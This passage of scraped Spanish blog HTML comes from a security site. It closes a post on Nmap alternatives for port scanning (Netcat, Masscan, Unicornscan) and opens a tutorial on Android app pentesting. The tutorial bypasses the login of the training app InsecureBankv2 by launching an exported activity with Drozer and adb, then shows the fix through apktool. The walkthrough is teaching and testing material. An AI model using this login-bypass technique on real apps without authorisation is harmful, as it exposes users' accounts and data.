círculo que indica el estado en que se encuentra </li><ul><li>Rojo: la IP nunca ha estado conectada a esa red.</li><li>Azul: la IP ha sido conectada pero no se encuentra activa en ese momento.</li><li>Verde: La IP se encuentra conectada en ese momento a la red </li></ul><li>El nombre del Host relacionado a esa IP.</li><li>Los puertos que se encuentran abiertos .</li></ul></div></span><span face="Calibri, sans-serif"><div style="text-align: justify;"> </div></span><span face="Calibri, sans-serif"><div style="text-align: justify;">Esta herramienta permite al usuario poder añadir más campos de observación, como puede ser la dirección MAC. </div></span><span><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><img border="0" data-original-height="208" data-original-width="725" height="184" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMjspju4SM87hEIK6_akPG_4lPOEYCWfymkVZmTk1YJ4g-pRmhfSgOQ-nTbrhZYUpd9lE4OSNMM1eXFpr6OKRwJnt3QoTzZou5-yAPwd8_RD5PYz3Xfu6jCIaKEGma0NCSz_n_Tbx6QQNjOgEsNDKqsvD-BWrSpGvBQhxKNdHJFBCdiwmf9hsrpxm5EWpR/w640-h184/Captura%20de%20pantalla%202023-12-21%20103220.png" style="text-align: left;" width="640" /></div><div style="text-align: justify;"><br /></div></span></span></div><div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">NETCAT</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Netcat carece de una interfaz gráfica, por lo que su utilización se realiza exclusivamente a través de la terminal. Esta herramienta se destaca por su gran versatilidad al permitir al usuario enumerar las direcciones IP y los puertos de su elección.</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-X_mSqPnpeMtywWICJev6XfenbCzX9hMuxxiIbcB93ZHodZiLv0zIRgr2TaW6NTVRjRuxd7dBgrdHnDj1XkoYTG6qdWv1f6I_CZ0f-iaC4mQOjbaOECxgwX52ztwx7CdaUgYdKucLOCu0ovSrDSgxq_OCjUB2rQv0A0XHHRV3dOoN6rDcwbwxL31gnx3B/s404/Captura%20de%20pantalla%202023-12-21%20103822.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="156" data-original-width="404" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-X_mSqPnpeMtywWICJev6XfenbCzX9hMuxxiIbcB93ZHodZiLv0zIRgr2TaW6NTVRjRuxd7dBgrdHnDj1XkoYTG6qdWv1f6I_CZ0f-iaC4mQOjbaOECxgwX52ztwx7CdaUgYdKucLOCu0ovSrDSgxq_OCjUB2rQv0A0XHHRV3dOoN6rDcwbwxL31gnx3B/w640-h248/Captura%20de%20pantalla%202023-12-21%20103822.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Además, esa versatilidad comentada anteriormente, permite al usuario poder realizar búsquedas de puertos por el nombre del protocolo.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFJRBCaUXbQOBeZDryYRI2UaZsXFXWsHx6zVzid1Gmo0lbY5vFj5LTrUr7eQDXOuQYiZZASEw-xUWYWRrdavkzufrGHq419X29V2BXcdV_pYhX2qSSuJRCGTZ5-xDZBYDqT7gujgrG76VljOytxXkQDmCSsdoqe-eKyzD6hDAxWBoGcVF38xxqDaF9oMDD/s591/Captura%20de%20pantalla%202023-12-21%20103710.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="96" data-original-width="591" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFJRBCaUXbQOBeZDryYRI2UaZsXFXWsHx6zVzid1Gmo0lbY5vFj5LTrUr7eQDXOuQYiZZASEw-xUWYWRrdavkzufrGHq419X29V2BXcdV_pYhX2qSSuJRCGTZ5-xDZBYDqT7gujgrG76VljOytxXkQDmCSsdoqe-eKyzD6hDAxWBoGcVF38xxqDaF9oMDD/w640-h104/Captura%20de%20pantalla%202023-12-21%20103710.png" width="640" /></span></a></div><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">MASSCAN</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">La tercera herramienta se trata de Masscan. Para usar Masscan tenemos que servirnos también de la terminal, debido a la ausencia de interfaz.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Permite al usuario poder buscar y enumerar puertos de varias direcciones IP en un mismo comando.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCtk_UyHrxyDo1a_hEHxv80ZuIvHr8Q5aVhY8sOm5XrO0UdkUbQDdYN_dR9o6azFT5gLjMaCMEEpbzJCbz8aBfN5Ry43Hd7S2ecQAc9I0O1VLcw9IiM_W6_9nXX9RFmLnex8gF6Pjpj-powIHBNut9ty7loNP4AamV2pghP4O_XGEC5D5xBDRntQARY2-S/s567/masscan%201.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="115" data-original-width="567" height="130" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCtk_UyHrxyDo1a_hEHxv80ZuIvHr8Q5aVhY8sOm5XrO0UdkUbQDdYN_dR9o6azFT5gLjMaCMEEpbzJCbz8aBfN5Ry43Hd7S2ecQAc9I0O1VLcw9IiM_W6_9nXX9RFmLnex8gF6Pjpj-powIHBNut9ty7loNP4AamV2pghP4O_XGEC5D5xBDRntQARY2-S/w640-h130/masscan%201.jpg" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">También existen diversas opciones para mostrar información adicional como mostrar los banners de algunos puertos (21). </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"> </span></div><span><span style="font-family: Barlow Semi Condensed;"><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCfgAZopQuNWEw5FbIzpx48SrasXY_LIgXgItLuTAoAg9gigr2PFYPXlKERHSp-ot8jafoWRH0r_vyMv6TesxsZxryW_bO5bzPDdckAatk0G5Z_XEt5MLQEUKj_CSG5DBzVN_UcTLjPEzzT0_1ayOSytP7Hm-srFTlZzelrQkxCMiYCd93DjS-GDwB65zc/s550/Masscan%202.png.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="243" data-original-width="550" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCfgAZopQuNWEw5FbIzpx48SrasXY_LIgXgItLuTAoAg9gigr2PFYPXlKERHSp-ot8jafoWRH0r_vyMv6TesxsZxryW_bO5bzPDdckAatk0G5Z_XEt5MLQEUKj_CSG5DBzVN_UcTLjPEzzT0_1ayOSytP7Hm-srFTlZzelrQkxCMiYCd93DjS-GDwB65zc/w640-h282/Masscan%202.png.jpg" width="640" /></a></div></span></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">UNICORNSCAN</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Finalmente, nos encontramos con Unicornscan, que, al igual que las dos herramientas mencionadas anteriormente, requiere la utilización de la terminal para su interacción. En términos de utilización, esta herramienta presenta similitudes destacadas con Nmap.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHi8inEcHNTKytD0FQxNmFhJoOHwiUMi0Snu5bedyiUG7OFezmH88Z-EOhXNow7i3Bmn5RLe4D5OAlBtVCpU1ludBTOs-NcpQQQ8aW0fQGiH1xzEcRv1vK7ablrkvxovg8rOXWsQQfeVB_jS4qlY25yc_O9YwkTO0_oN0_ZyuDEyR1tpFxIsBdIqLDOIGG/s567/unicornscan.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="123" data-original-width="567" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHi8inEcHNTKytD0FQxNmFhJoOHwiUMi0Snu5bedyiUG7OFezmH88Z-EOhXNow7i3Bmn5RLe4D5OAlBtVCpU1ludBTOs-NcpQQQ8aW0fQGiH1xzEcRv1vK7ablrkvxovg8rOXWsQQfeVB_jS4qlY25yc_O9YwkTO0_oN0_ZyuDEyR1tpFxIsBdIqLDOIGG/w640-h138/unicornscan.jpg" width="640" /></span></a></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3ozbIKi0vpv4Z96lVEgdFWf0dqVGrl5hoT0k_12G5vhRy6O8Rr6GO2i4lacQoUbuZCRyMPTFUCOwqJHwOcohCg4Q4L5biUITwYtpAptO9DlpfYHO6HjdJHYlyFeLXHO_b_57JT-aTy5lN3jlJ0y46f7i_VcbEH_TqONdZLTeduj2i3YY7B3NCLr3SyMxB/s567/unicornscan%202.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="79" data-original-width="567" height="90" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3ozbIKi0vpv4Z96lVEgdFWf0dqVGrl5hoT0k_12G5vhRy6O8Rr6GO2i4lacQoUbuZCRyMPTFUCOwqJHwOcohCg4Q4L5biUITwYtpAptO9DlpfYHO6HjdJHYlyFeLXHO_b_57JT-aTy5lN3jlJ0y46f7i_VcbEH_TqONdZLTeduj2i3YY7B3NCLr3SyMxB/w640-h90/unicornscan%202.jpg" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Una de las diferencias con el resto de herramientas es que Unicornscan da la opción de mostrarte todos los puertos que ha revisado. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbKGYUsyhAHyfCdou-vZGM-Qp4P081CVHF5nw3URkej_4p_zylqCpBM64km-PMeqcXh6j68AcEKWtr6fGGUUrYeVA8QCy2-EvaEdwl_ezPzgePTZZDgotrkgfN8yR3_cMwJrN5aLtrapQXLkb3SLyiyyv9yoeSiR_oEJgibQ0g8LCrafgl1ZY7VQY31zJC/s709/unicornscan3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="184" data-original-width="709" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbKGYUsyhAHyfCdou-vZGM-Qp4P081CVHF5nw3URkej_4p_zylqCpBM64km-PMeqcXh6j68AcEKWtr6fGGUUrYeVA8QCy2-EvaEdwl_ezPzgePTZZDgotrkgfN8yR3_cMwJrN5aLtrapQXLkb3SLyiyyv9yoeSiR_oEJgibQ0g8LCrafgl1ZY7VQY31zJC/w640-h166/unicornscan3.jpg" width="640" /></span></a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Y hasta aquí algunas de las herramientas alternativas al NMAP.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: right;"><span style="font-family: Barlow Semi Condensed;"><a href="https://www.linkedin.com/in/jorge-ezequiel-de-francisco-bernal-a38870231/">Jorge Ezequiel de Francisco</a>, analista de ciberseguridad en <a href="http://www.zerolynx.com/es">Zerolynx</a>.</span></div>Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0Madrid, España40.4167754 -3.703790212.106541563821153 -38.8600402 68.727009236178844 31.4524598tag:blogger.com,1999:blog-7938680518783212855.post-64375788231212484582023-12-26T09:00:00.006+01:002023-12-26T09:00:00.136+01:00Introducción al pentesting de aplicaciones móviles sin morir en el intento. Parte II<div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbgBuW6OURBhuibGo46HUHZIReqBhF395A7D3mxrPNqgciAWkJKEuFWtFKzDBsPBudQXc6wY_tNKZNGfijvXN2vATWDg_oUxialskH1V6nbsNj_BUcO1tqNdlRkuK6D3XOaqYCkKimRLzJAss4s60x8iYDDiDJG52JpFcNTrrWpdCyOjhVHmXK1RXibTXv/s1920/Dise%C3%B1o%20sin%20t%C3%ADtulo%20(18).jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbgBuW6OURBhuibGo46HUHZIReqBhF395A7D3mxrPNqgciAWkJKEuFWtFKzDBsPBudQXc6wY_tNKZNGfijvXN2vATWDg_oUxialskH1V6nbsNj_BUcO1tqNdlRkuK6D3XOaqYCkKimRLzJAss4s60x8iYDDiDJG52JpFcNTrrWpdCyOjhVHmXK1RXibTXv/w640-h360/Dise%C3%B1o%20sin%20t%C3%ADtulo%20(18).jpg" width="640" /></a></div><span style="font-family: "Barlow Semi Condensed";"><br /></span></div><div style="text-align: justify;"><span style="font-family: "Barlow Semi Condensed";"><br /></span></div><div style="text-align: justify;"><span style="font-family: "Barlow Semi Condensed";">Hace algunos artículos os hicimos una primera <a href="https://www.flu-project.com/2023/12/PentestingAplicacionesM.html">introducción al pentesting de aplicaciones móviles</a> en donde asentábamos las primeras bases entre lo que es un análisis estático de la aplicación y un análisis dinámico. Hoy os hablaremos sobre las actividades exportables: </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">La clase Activity es fundamental para una App de Android, como los paradigmas de programación en los que los programas se ejecutan con el método main(), el sistema Android se inicia en una instancia de Activity. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Una actividad básicamente proporciona la ventana en la que las Apps dibujan su IU, la existencia de las actividades nos permite realizar varias acciones dentro de la misma ventana, ya que una actividad puede invocar otras para mostrarnos diferentes pantallas. Es el punto de entrada de una aplicación, son las pantallas visibles con las que interactúa el usuario.</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVQY9G5OZC25GLZeMNuAAacxI0JU7Eu41HkMUrg1lWWIqx7wzQcgid_mmz_tfh5upfcSRu8gvaGBuoGwJU1dMKWNdaYXjYxjHIp-DFq3MF6O5ZnYEgRGu9BdNnUWAZZy-FNThUb7dGg0u5tBB_EWA5lOa_uORM-ZqA4pr394L-g7uWx6nXIylsly65ovJw/s574/2023-12-05%2012_26_24-Mobunty.docx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="279" data-original-width="574" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVQY9G5OZC25GLZeMNuAAacxI0JU7Eu41HkMUrg1lWWIqx7wzQcgid_mmz_tfh5upfcSRu8gvaGBuoGwJU1dMKWNdaYXjYxjHIp-DFq3MF6O5ZnYEgRGu9BdNnUWAZZy-FNThUb7dGg0u5tBB_EWA5lOa_uORM-ZqA4pr394L-g7uWx6nXIylsly65ovJw/w640-h312/2023-12-05%2012_26_24-Mobunty.docx.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Una actividad exportable en aplicaciones de Android es aquella que puede ser accedida por otras aplicaciones, similar a una clase pública en Java. Para identificar si una actividad es exportable, se pueden considerar los siguientes casos:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;">Una actividad exportable tiene asignado el atributo Android:exported= “true” en el fichero AndroidManifest.xml</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">Cuando este atributo no está definido, pero tiene existe <intent-filter>, el valor de Android:exported es true por defecto.</span></li></ul></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Una configuración deficiente de estas actividades, sin protección adecuada, podría ser una entrada muy favorable para los atacantes. Esto les permitiría obtener información sensible o incluso ejecutar ataques como XSS.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Usaremos la aplicación InsecureBankv2 como ejemplo. Si entramos a la aplicación, nos encontraremos con la ventana principal de la aplicación, una ventana de login donde nos pide un usuario y una contraseña para autenticarnos. Ahora bien, como atacantes, queremos evadir esta actividad de login, de la cual no conocemos las credenciales. </span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkI_Z-FhY4hW1JbC8agy8NECkiDL9tqFKbfDWpTapzdQBPZvh9sFqdK5AroqaempAt7hDHJCcAd_nS4Vv2HVanZP3GscjJbvYBTmBEhNDfwv-QoJ5C80WHXu7ZL5Af3gxA_k1svflh7BNsZ84q-3z2AG5AsEeVwaZVu6NH9Ac-0fov59h4pCzcAfRUO4Nh/s364/2023-12-05%2012_26_40-Mobunty.docx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="364" data-original-width="293" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkI_Z-FhY4hW1JbC8agy8NECkiDL9tqFKbfDWpTapzdQBPZvh9sFqdK5AroqaempAt7hDHJCcAd_nS4Vv2HVanZP3GscjJbvYBTmBEhNDfwv-QoJ5C80WHXu7ZL5Af3gxA_k1svflh7BNsZ84q-3z2AG5AsEeVwaZVu6NH9Ac-0fov59h4pCzcAfRUO4Nh/w516-h640/2023-12-05%2012_26_40-Mobunty.docx.png" width="516" /></span></a></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Podemos usar Drozer para sacar vulnerabilidades o configuraciones inadecuadas de la aplicación:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Una vista previa de la superficie de ataque usando Drozer:</span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span style="font-family: courier;">Run app.package.attacksurface com.android.insecurebankv2</span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-V_w8P5uIELl5Y8rnsp3wnS8udAI43ywfanEANFyKfKvn6xTcuhpDKFozRc-c0UzQZZD5FLvGCErmIK_G_GCRooWrz9tNU2j-3l4MDM-u3YmscPNM6V6TgXV0cnooXyi97pRfqIpad-FI-DRzfOSeKIzg6sxMIFfQkC8TH3OD047dtfyQucbQilulw2NE/s535/2023-12-05%2012_26_55-Mobunty.docx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="109" data-original-width="535" height="130" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-V_w8P5uIELl5Y8rnsp3wnS8udAI43ywfanEANFyKfKvn6xTcuhpDKFozRc-c0UzQZZD5FLvGCErmIK_G_GCRooWrz9tNU2j-3l4MDM-u3YmscPNM6V6TgXV0cnooXyi97pRfqIpad-FI-DRzfOSeKIzg6sxMIFfQkC8TH3OD047dtfyQucbQilulw2NE/w640-h130/2023-12-05%2012_26_55-Mobunty.docx.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivyuenGDVAkH-ZpOMpzm3Q7gXIK-RzUf-oL_0MmQCoowpZo0OKuVn0uMev_ZnUbJoUvOvFS9KtC1Xm5BOiKN5AA0t4K8canlgYiQNa78e3kB_NxSo2URa-TjmgHtJPRGV-g_N0xb8axnsAiUxxC9CrM9rLlY4IH8KvDQPyxeaWZtTMfN0gtSCUPi1qu3uj/s492/2023-12-05%2012_27_14-Mobunty.docx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="207" data-original-width="492" height="270" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivyuenGDVAkH-ZpOMpzm3Q7gXIK-RzUf-oL_0MmQCoowpZo0OKuVn0uMev_ZnUbJoUvOvFS9KtC1Xm5BOiKN5AA0t4K8canlgYiQNa78e3kB_NxSo2URa-TjmgHtJPRGV-g_N0xb8axnsAiUxxC9CrM9rLlY4IH8KvDQPyxeaWZtTMfN0gtSCUPi1qu3uj/w640-h270/2023-12-05%2012_27_14-Mobunty.docx.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Podemos observar que hay una actividad muy interesante PostLogin, además no se necesita ningún permiso para invocar esta actividad.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Por otra parte, aunque es más tedioso, también podemos hacer la búsqueda de forma manual, revisar en AndroidManifest.xml para encontrar actividades exportables. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Con jadx se puede abrir la APK y en AndoridManifest.xml podemos encontrar la actividad exportable PostLogin:</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB7KWKu2DXFSvAjUWiiX07HbWzKmTqMUcH7ydGLx29a161aJFPJqsWEjza-caz0_cxNAPj1dIJG35qWBz0zLtipUiOmp6i7FeTf-gt2vRN1tjaW6l0gt1MWZ2Bwkk_i8SWaaZLkF_VV-8C7zxwfoG4TlzC4ypmdFpOuOTWf9Kqwa3ishMhrPeKGrhl1CyF/s680/2023-12-05%2012_27_27-Mobunty.docx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="67" data-original-width="680" height="64" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB7KWKu2DXFSvAjUWiiX07HbWzKmTqMUcH7ydGLx29a161aJFPJqsWEjza-caz0_cxNAPj1dIJG35qWBz0zLtipUiOmp6i7FeTf-gt2vRN1tjaW6l0gt1MWZ2Bwkk_i8SWaaZLkF_VV-8C7zxwfoG4TlzC4ypmdFpOuOTWf9Kqwa3ishMhrPeKGrhl1CyF/w640-h64/2023-12-05%2012_27_27-Mobunty.docx.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Una vez que tengamos identificado la actividad que nos interesa, usaremos adb para exportar la dicha actividad:</span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span style="font-family: courier;">‘abd -s 172.16.20.175 shell’</span></div><div style="text-align: justify;"><br /></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFpqSNZE7dzYhTJIsy3zgPL3HlcZZYvGCyOYem669rY1uFBBY6y6HfgNjyMyxihXTaoscoN-142LbifbpVrPdOh-xJ3YjjNbASKEgrzEWXSkMyjHboeIiHhNpS0funhUG-FLZIQzRyWJ9tV9quAsNX4lAfsZZM6xl8FXlOsCujl2Ey58B0tu_9mL_Apdr0/s676/2023-12-05%2012_27_35-Mobunty.docx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="66" data-original-width="676" height="62" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFpqSNZE7dzYhTJIsy3zgPL3HlcZZYvGCyOYem669rY1uFBBY6y6HfgNjyMyxihXTaoscoN-142LbifbpVrPdOh-xJ3YjjNbASKEgrzEWXSkMyjHboeIiHhNpS0funhUG-FLZIQzRyWJ9tV9quAsNX4lAfsZZM6xl8FXlOsCujl2Ey58B0tu_9mL_Apdr0/w640-h62/2023-12-05%2012_27_35-Mobunty.docx.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLxyo4aQS67zFp6LxqbZH8nlEIWsbCwJXrrfBSnk49xeDLTyZ1CWRczUqXSzjt0nnb6Ox-ZJ6DfOa0mT21O2KNH53pEMFthcF2aO91XoZGi1kmNt0omDAnnlQk3T7W7fU2oQYa_mS5UGRfL2rZ6VirVMI8czQKUrLOJqr3ChhG8wZBBITBG9A85mH8LkY6/s391/2023-12-05%2012_28_03-Mobunty.docx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="391" data-original-width="380" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLxyo4aQS67zFp6LxqbZH8nlEIWsbCwJXrrfBSnk49xeDLTyZ1CWRczUqXSzjt0nnb6Ox-ZJ6DfOa0mT21O2KNH53pEMFthcF2aO91XoZGi1kmNt0omDAnnlQk3T7W7fU2oQYa_mS5UGRfL2rZ6VirVMI8czQKUrLOJqr3ChhG8wZBBITBG9A85mH8LkY6/w622-h640/2023-12-05%2012_28_03-Mobunty.docx.png" width="622" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Efectivamente, hemos conseguido hacer el bypass del Login. Ya estamos dentro de la aplicación bancaria, desde la cual podríamos hacer transferencias, cambiar la contraseña, ver estado de cuenta, etc. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Por otro lado, podemos observar que la aplicación tiene antiroot configurado. Este mecanismo de seguridad implementado por el desarrollador es una buena práctica para complicar los ataques de reversing, en próximos capítulos hablaremos más acerca de ello y como evadir este tipo de mecanismos de seguridad.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Lo que debería realizar un desarrollador para corregir esta vulnerabilidad seria cambiar el valor de este atributo para de esta forma deshabilitar el permiso. En este caso vamos a hacerlo nosotros para comprobar si realmente corrige el acceso a esta última actividad (PostLogin) como debería.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">A continuación, procedemos a decompilar la aplicación con apktool, y modificar el atributo exported.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Descompilamos el APK:</span></div></div><div style="text-align: justify;"><br /></div><div><div style="text-align: justify;"><span style="font-family: courier;">Apktool d app.release.apk -o insecureBank-apktool</span></div><div style="text-align: justify;"><br /></div></div><div style="text-align: justify;"><span 